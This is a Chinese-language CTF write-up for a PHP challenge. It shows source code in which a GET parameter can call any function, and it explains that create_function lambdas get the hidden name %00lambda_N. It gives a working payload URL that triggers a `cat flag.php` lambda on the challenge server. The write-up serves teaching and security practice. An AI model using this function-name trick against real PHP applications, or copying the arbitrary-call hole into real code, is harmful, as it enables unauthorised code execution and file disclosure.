知识点:
匿名函数创建其实有自己的名字(%00lambda_%d)
进入页面开始代码审计.
<?php // 使用 create_function 创建一个匿名函数,该函数调用 die() 函数并执行 `cat flag.php` 命令(在服务器上执行,如果PHP环境配置不当的话)。
// 注意:`cat flag.php` 尝试读取名为 flag.php 的文件内容,这通常用于CTF(Capture The Flag)竞赛中,文件包含“flag”(即比赛的解决标志)。
// 但直接在PHP中执行系统命令(如 `cat`)是危险的,特别是当命令来源不可控时。
$MY = create_function("","die(`cat flag.php`);"); // 生成一个随机的32字节字符串,并使用bin2hex函数将其转换为十六进制表示,用作函数名的前缀。
$hash = bin2hex(openssl_random_pseudo_bytes(32)); // 使用 eval() 函数动态地创建一个新函数,函数名为 "SUCTF_" 加上之前生成的随机哈希值。
// 这个新函数全局调用之前创建的 $MY 匿名函数,即执行 `die(`cat flag.php`);`。
// 使用 eval() 是非常危险的,因为它会执行任何传递给它的PHP代码。
eval("function SUCTF_$hash(){" ."global \$MY;" // 声明使用全局变量 $MY ."\$MY();" // 调用 $MY 匿名函数 ."}"); // 检查 $_GET['func_name'] 是否被设置。
// 如果设置了,则尝试调用对应的函数。这里存在一个严重的安全问题,因为它允许远程用户通过URL参数调用任意函数。
if(isset($_GET['func_name'])){ $_GET["func_name"](); // 直接调用通过URL参数指定的函数 die(); // 调用后终止脚本
} // 如果没有通过URL传递func_name参数,则显示当前文件的源代码。
show_source(__FILE__);
知识点: 当在调用执行 create_function() 创建匿名函数的时候,其实创建的函数是有名字的
格式为:%00lambda_%d ,而%d则是一个计数器会递增,用来记录create_function()这个函数执行了多少次.
所以我们可以通过调用那个匿名函数(%d=1)来实现cat flag.php的操作.
开始构造payload:
http://1168ccea-8b4f-4672-8b5d-81ce3115b007.node5.buuoj.cn:81/?func_name=%00lambda_1
开始注入.
获得flag.
当然还没有结束 ,尝试了几次%d=1后这个payload才失效,然后就尝试%d=2又成功了,之后经过我多次的尝试当%d递增到9后他又回到了%d=1,而且每次%d的变动都是经过了几次的重复才会递增,
这说明这个服务器可能是一个多进程模式,每次请求都会有一个新的php环境(有限),所以%d会递增(存在规律).